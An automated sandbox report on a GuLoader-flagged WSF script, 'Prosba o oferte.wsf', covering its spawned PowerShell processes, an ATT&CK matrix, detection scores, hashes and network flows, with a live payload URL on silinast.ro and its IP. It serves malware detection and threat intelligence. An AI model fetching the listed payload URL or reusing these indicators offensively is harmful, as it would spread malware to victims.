              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5558
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4364
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6694
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3150
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7612 Thread sleep time: -3689348814741908s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8048 Thread sleep time: -1844674407370954s >= -30000s
              Source: powershell.exe, 00000004.00000002.2138100600.000002CC9D367000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.4232905007.0000000007035000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_029EDAAC LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,9_2_029EDAAC

              HIPS / PFW / Operating System Protection Evasion

              Source: Yara match File source: amsi64_7468.amsi.csv, type: OTHER
              Source: Yara match File source: Process Memory Space: powershell.exe PID: 7468, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: powershell.exe PID: 7936, type: MEMORYSTR
              Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c ping 6777.6777.6777.677e
              Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (obfuscated script passed on the command line)
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 6777.6777.6777.677e
              Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" (obfuscated script passed on the command line)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
              Gather Victim Identity Information | 22 Scripting | Valid Accounts | 1 Windows Management Instrumentation | 22 Scripting | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 1 Security Software Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
              Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 DLL Side-Loading | 21 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
              Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 21 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
              Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 2 Obfuscated Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
              Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Software Packing | LSA Secrets | 1 Remote System Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
              Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 1 System Network Configuration Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
              DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
              Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 13 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
              Source | Detection | Scanner | Label
              Prosba o oferte.wsf | 8% | Virustotal |
              Prosba o oferte.wsf | 13% | ReversingLabs | Script-WScript.Trojan.GuLoader
              No Antivirus matches
              No Antivirus matches
              Source | Detection | Scanner | Label
              silinast.ro | 10% | Virustotal |
              Source | Detection | Scanner | Label
              http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
              http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
              https://aka.ms/pscore6lB | 0% | URL Reputation | safe
              https://go.micro | 0% | URL Reputation | safe
              https://contoso.com/ | 0% | URL Reputation | safe
              https://nuget.org/nuget.exe | 0% | URL Reputation | safe
              https://contoso.com/License | 0% | URL Reputation | safe
              https://contoso.com/Icon | 0% | URL Reputation | safe
              https://aka.ms/pscore68 | 0% | URL Reputation | safe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
              http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Virustotal |
              http://silinast.ro | 10% | Virustotal |
              https://github.com/Pester/Pester | 1% | Virustotal |
              http://silinast.ro/Kommunikuternes.inf | 9% | Virustotal |
              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              silinast.ro | 188.241.183.45 | true | false | | unknown
              6777.6777.6777.677e | unknown | unknown | true | | unknown
                Name | Malicious | Antivirus Detection | Reputation
                http://silinast.ro/Kommunikuternes.inf | true | | unknown
                Name | Source | Malicious | Antivirus Detection | Reputation
                http://silinast.ro | powershell.exe, 00000004.00000002.2103502610.000002CC86B70000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2103502610.000002CC86A09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2103502610.000002CC866B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2103502610.000002CC84EA8000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
                http://nuget.org/NuGet.exe | powershell.exe, 00000004.00000002.2131900489.000002CC94CF3000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                http://silinast.ro/Kommunikuternes.infP | powershell.exe, 00000004.00000002.2103502610.000002CC84EA8000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
                http://pesterbdd.com/images/Pester.png | powershell.exe, 00000004.00000002.2103502610.000002CC84EA8000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                https://aka.ms/pscore6lB | powershell.exe, 00000009.00000002.4214260996.0000000004551000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000004.00000002.2103502610.000002CC84EA8000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
                https://go.micro | powershell.exe, 00000004.00000002.2103502610.000002CC8590B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                https://contoso.com/ | powershell.exe, 00000004.00000002.2131900489.000002CC94CF3000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                https://nuget.org/nuget.exe | powershell.exe, 00000004.00000002.2131900489.000002CC94CF3000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                https://contoso.com/License | powershell.exe, 00000004.00000002.2131900489.000002CC94CF3000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                https://contoso.com/Icon | powershell.exe, 00000004.00000002.2131900489.000002CC94CF3000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                http://silinast.ro/Kommunikuternes.infXR$lX | powershell.exe, 00000009.00000002.4214260996.00000000046A9000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
                https://aka.ms/pscore68 | powershell.exe, 00000004.00000002.2103502610.000002CC84C81000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                http://silinast.roXh | powershell.exe, 00000004.00000002.2103502610.000002CC86A09000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000004.00000002.2103502610.000002CC84C81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.4214260996.0000000004551000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                http://silinast.roXR | powershell.exe, 00000004.00000002.2103502610.000002CC86B70000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
                https://github.com/Pester/Pester | powershell.exe, 00000004.00000002.2103502610.000002CC84EA8000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
                        IP | Domain | Country | ASN | ASN Name | Malicious
                        188.241.183.45 | silinast.ro | Romania | 5588 | GTSCEGTSCentralEuropeAntelGermanyCZ | false
                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1528867
                        Start date and time:2024-10-08 10:58:18 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 8m 1s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:12
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:Prosba o oferte.wsf
                        Detection:MAL
                        Classification:mal100.troj.expl.evad.winWSF@11/7@2/1
                        EGA Information:Failed
                        HCA Information:
                        • Successful, ratio: 88%
                        • Number of executed functions: 59
                        • Number of non-executed functions: 21
                        Cookbook Comments:
                        • Found application associated with file extension: .wsf
                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Execution Graph export aborted for target powershell.exe, PID 7468 because it is empty
                        • Execution Graph export aborted for target powershell.exe, PID 7936 because it is empty
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        Time | Type | Description
                        04:59:20 | API Interceptor | 226x Sleep call for process: powershell.exe modified
                        Match | Associated Sample Name / URL | Detection | Threat Name | Context
                        188.241.183.45 | g 288322.vbs | malicious | GuLoader | silinast.ro/Loveman232.msi
                        Match | Associated Sample Name / URL | Detection | Threat Name | Context
                        silinast.ro | g 288322.vbs | malicious | GuLoader | 188.241.183.45
                        silinast.ro | Cerere oferta S.C. SHIPYARD ATG GIURGIU S.R.L..vbs | malicious | GuLoader | 188.241.183.45
                        Match | Associated Sample Name / URL | Detection | Threat Name | Context
                        GTSCEGTSCentralEuropeAntelGermanyCZ | ZAMOWIEN.EXE.exe | malicious | AgentTesla, GuLoader | 185.146.87.128
                        GTSCEGTSCentralEuropeAntelGermanyCZ | na.elf | malicious | Unknown | 94.42.225.21
                        GTSCEGTSCentralEuropeAntelGermanyCZ | https://alquimista.hosted.phplist.com/lists/lt.php?tid=cE0FU1AHDgIFBx4AXQpVFAZXX18ZAwJTUx9QXA8AVFIMCQAEUVZKAFQHUVFfBFYUCloJBRlWDQ1SH15cAl1MUAFUAwIDUgNQUFlSHQxTUg1XUF9VGVIHVgUfUlgOUUxZXAZSGFMFDwxZBFdUWAEDAA | malicious | Unknown | 188.241.222.249
                        GTSCEGTSCentralEuropeAntelGermanyCZ | ZAMOWIEN.EXE.exe | malicious | AgentTesla, GuLoader | 185.146.87.128
                        GTSCEGTSCentralEuropeAntelGermanyCZ | g 288322.vbs | malicious | GuLoader | 188.241.183.45
                        GTSCEGTSCentralEuropeAntelGermanyCZ | na.elf | malicious | Mirai | 94.42.225.83
                        GTSCEGTSCentralEuropeAntelGermanyCZ | na.elf | malicious | Mirai | 62.168.37.193
                        GTSCEGTSCentralEuropeAntelGermanyCZ | na.elf | malicious | Mirai | 94.42.225.84
                        GTSCEGTSCentralEuropeAntelGermanyCZ | na.elf | malicious | Mirai | 94.42.225.74
                        GTSCEGTSCentralEuropeAntelGermanyCZ | arm-20241006-0950.elf | malicious | Mirai | 212.38.198.232
                        No context
                        No context
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:modified
                        Size (bytes):11608
                        Entropy (8bit):4.8908305915084105
                        Encrypted:false
                        SSDEEP:192:yVsm5eml2ib4LxoeRm3YrKkzYFQ9smKp5pVFn3eGOVpN6K3bkkjo5xgkjDt4iWNH:yCib4PYbLVoGIpN6KQkj2qkjh4iUx6iP
                        MD5:FE1902820A1CE8BD18FD85043C4D9C5C
                        SHA1:62F24EAE4A42BA3AE454A6FAB07EF47D1FE9DFD6
                        SHA-256:8BBDC66564B509C80EA7BE85EA9632ACD0958008624B829EA4A24895CA73D994
                        SHA-512:8D1BADE448F0C53D6EC00BC9FACDBCB1D4B1B7C61E91855206A08BDBF61C6E4A40210574C4193463C8A13AE692DD80897F3CE9E39958472705CF17D77FE9C1D9
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Preview:PSMODULECACHE.....$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module........Find-Command........Unregister-PSRepository........Get-InstalledScript........Get-DynamicOptions........Add-PackageSource........Register-PSRepository........Find-DscResource........Publish-Script........Find-RoleCapability........Uninstall-Package........Get-PackageDependencies........pumo........fimo........Find-Script........Initialize-Provider........Get-PackageProviderName........Test-ScriptFileInfo........Get-InstalledModule........Update-ScriptFileInfo........Get-InstalledPackage........Resolve-PackageSource........Uninstall-Module........inmo........Remove-PackageSource........Update-Script........Uninstall-Script........Update-ModuleManifest........Get-Feature........Install-Module........Install-Package........New-ScriptFileInfo...
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):64
                        Entropy (8bit):1.1940658735648508
                        Encrypted:false
                        SSDEEP:3:Nlllulbnolz:NllUc
                        MD5:F23953D4A58E404FCB67ADD0C45EB27A
                        SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                        SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                        SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Preview:@...e................................................@..........
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with very long lines (65536), with no line terminators
                        Category:dropped
                        Size (bytes):482184
                        Entropy (8bit):5.859113802198451
                        Encrypted:false
                        SSDEEP:12288:OHl6CKrv7a9QHzB3zdF/TwsCO7qreFYTSyZNg+:4l6CTc3zXEsCgqKFYmyZd
                        MD5:1FFE621A17628D011F407E9AF5E31D0C
                        SHA1:1F8CEE49BC91220D8F565A78F806B403C3B7FCD8
                        SHA-256:B2BE96DA105DA570CC6613DC7DABEFA5498284BC3BAC631FB4D629410F952851
                        SHA-512:1E22D1EE3D5ADA5DE8F11B0FCDF1CB8045BA49284913BAD247BD477C81287CA035C6D48015DB7A38AC550BC4EDFFFA81AFC91DB66097D76614C9AC01E21BDD90
                        Malicious:false
                        File type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Entropy (8bit):5.245576267100618
                        TrID:
                        • Visual Basic Script (13500/0) 72.95%
                        • Generic XML (ASCII) (5005/1) 27.05%
                        File name:Prosba o oferte.wsf
                        File size:14'268 bytes
                        MD5:28ce58ca6b41786b0bd031af45f91d89
                        SHA1:7b72d8d9995bc61daf0074e967945ac6ed02a093
                        SHA256:43f28bfd339504ab45e4a3f52f8172036e196ef40e03ffcf6d5626f87a93f0e1
                        SHA512:867dc76350c2ef42ee8c45bd175b5ec00d41dd5f6fb7f91ebab887ab465f4a4fb02952f2ca655c0482be34ea61c8a7c7da77bb429516a2bc932d1952d8041c5d
                        SSDEEP:384:kp7GHbkJgp7zQqoS6sEpmhcM/RJE0cgtepn/2wP:SG7kHvS6sEohn/XVNt2OwP
                        TLSH:5852A448450F1B8E2D532F316E8E3D704EEC8626AF3980117679EEA4F12DC954CBA9DD
                        File Content Preview:<?xml version="1.0" ?>..<job id="Motorically">..<script ..language="VBScript">..' <![CDATA[..Private Const Helnodes = -21686..Private Const Lnnedgang = 1562..Private Const dekuprsave = 18205..Private Const Chondralgia = &HB29E..Private Const Gloominess
                        Icon Hash:68d69b8f86ab9a86
                        Document Type:Text
                        Number of OLE Files:1
                        Has Summary Info:
                        Application Name:
                        Encrypted Document:False
                        Contains Word Document Stream:False
                        Contains Workbook/Book Stream:False
                        Contains PowerPoint Document Stream:False
                        Contains Visio Document Stream:False
                        Contains ObjectPool Stream:False
                        Flash Objects Count:0
                        Contains VBA Macros:True
                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                        Oct 8, 2024 10:59:38.667407036 CEST8049754188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:38.667870998 CEST8049754188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:42.689210892 CEST4975580192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:42.694581985 CEST8049755188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:42.694840908 CEST4975580192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:42.694840908 CEST4975580192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:42.700072050 CEST8049755188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:42.700325012 CEST8049755188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:42.700927973 CEST4975680192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:42.705878019 CEST8049756188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:42.706031084 CEST4975680192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:42.708072901 CEST4975680192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:42.711604118 CEST8049756188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:42.711667061 CEST4975680192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:42.713413954 CEST8049756188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:42.716772079 CEST8049756188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:46.721021891 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:46.726466894 CEST8049757188.241.183.45192.168.2.4
